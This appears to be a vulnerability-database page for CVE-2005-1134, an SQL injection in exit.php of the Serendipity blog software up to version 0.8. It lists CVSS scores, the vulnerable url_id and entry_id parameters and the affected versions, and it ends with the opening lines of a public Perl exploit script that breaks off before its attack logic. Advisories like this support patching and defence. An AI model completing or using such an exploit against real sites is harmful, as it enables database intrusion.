7.5
CVSSv2

CVE-2005-1134

Published: 13/04/2005 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in exit.php for Serendipity 0.8 and previous versions allows remote malicious users to execute arbitrary SQL commands via the (1) url_id or (2) entry_id parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

s9y serendipity 0.6_pl2

s9y serendipity 0.6_pl3

s9y serendipity 0.7_beta4

s9y serendipity 0.7_rc1

s9y serendipity 0.5

s9y serendipity 0.5_pl1

s9y serendipity 0.7

s9y serendipity 0.7_beta1

s9y serendipity 0.6

s9y serendipity 0.6_pl1

s9y serendipity 0.7_beta2

s9y serendipity 0.7_beta3

s9y serendipity 0.3

s9y serendipity 0.4

s9y serendipity 0.6_rc1

s9y serendipity 0.6_rc2

s9y serendipity 0.8_beta5

s9y serendipity 0.8_beta6

Exploits

#!/usr/bin/perl # Serendipity 08beta4 exitphp SQL Injection exploit # (c) ADZ Security Team 2004-2005 # (c) kreon 2005 # adzvoidru/ # kre0n@mailru # Public :) print "\n\n"; print "# Serendipity 08beta4 exitphp SQL Injection exploit\n"; print "# (C) ADZ Security Team 2004-2005\n"; print "# (C) kreon 2005\n"; use IO::Socket; use Getop ...